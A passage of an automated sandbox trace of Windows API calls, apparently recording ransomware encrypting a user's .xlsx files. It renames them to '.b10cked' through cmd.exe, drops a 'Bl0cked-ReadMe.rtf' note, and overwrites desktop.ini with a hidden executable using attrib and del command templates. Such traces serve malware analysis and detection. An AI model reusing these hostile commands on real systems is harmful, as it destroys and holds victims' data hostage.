lpMultiByteStr=0x131322c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bUW1gWS4k.xlsx", lpUsedDefaultChar=0x0) returned 14 [0130.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4414 [0130.403] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0130.403] CloseHandle (hObject=0x114) returned 1 [0130.404] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\bUW1gWS4k.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS") returned 0x26 [0130.404] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0130.404] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x53c, dwThreadId=0x4e4)) returned 1 [0130.409] CloseHandle (hObject=0x110) returned 1 [0130.409] CloseHandle (hObject=0x114) returned 1 [0130.409] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0130.409] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0130.409] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0130.409] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.409] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.410] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.410] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.410] ReleaseMutex (hMutex=0xf8) returned 1 [0130.410] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\P939uI0IUIKwHsX.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\p939ui0iuikwhsx.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18719925458) returned 1 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16206 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16206 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) 
returned 0x15d1e [0130.411] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16206 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.412] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16206 [0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.413] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb102, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb102, lpOverlapped=0x0) returned 1 
[0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.413] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb102, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb102, lpOverlapped=0x0) returned 1 [0130.413] SetFilePointer (in: hFile=0x114, lDistanceToMove=-45314, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb104 [0130.413] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb102, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb102, lpOverlapped=0x0) returned 1 [0130.414] SetFilePointer (in: hFile=0x114, lDistanceToMove=-45314, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb104 [0130.414] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb102, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb102, lpOverlapped=0x0) returned 1 [0130.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="P939uI0IUIKwHsX.xlsx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="P939uI0IUIKwHsX.xlsx", cchWideChar=20, lpMultiByteStr=0x13286a4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P939uI0IUIKwHsX.xlsx", lpUsedDefaultChar=0x0) returned 20 [0130.418] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16206 [0130.418] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, 
nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0130.418] CloseHandle (hObject=0x114) returned 1 [0130.419] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\P939uI0IUIKwHsX.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS") returned 0x2f [0130.420] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0130.420] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x248, dwThreadId=0x42c)) returned 1 [0130.440] CloseHandle (hObject=0x110) returned 1 [0130.440] CloseHandle (hObject=0x114) returned 1 [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 
0x2f [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0130.440] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0130.440] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0130.440] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0130.440] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0130.440] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0130.440] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0130.440] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0130.440] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0130.440] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0130.440] CreateProcessW (in: 
lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x828, dwThreadId=0x838)) returned 1 [0130.445] CloseHandle (hObject=0x110) returned 1 [0130.445] CloseHandle (hObject=0x114) returned 1 [0130.445] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0xffffffff [0130.445] GetLastError () returned 0x2 [0130.445] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0130.449] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0130.449] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, 
lpString2="\\", cchCount2=1) returned 2 [0130.449] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0130.449] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0130.449] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0130.449] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0130.449] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0130.449] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0130.449] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0130.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0130.450] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0130.450] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1") returned 0x22 [0130.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\FCFNNE~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0130.450] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0130.450] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 
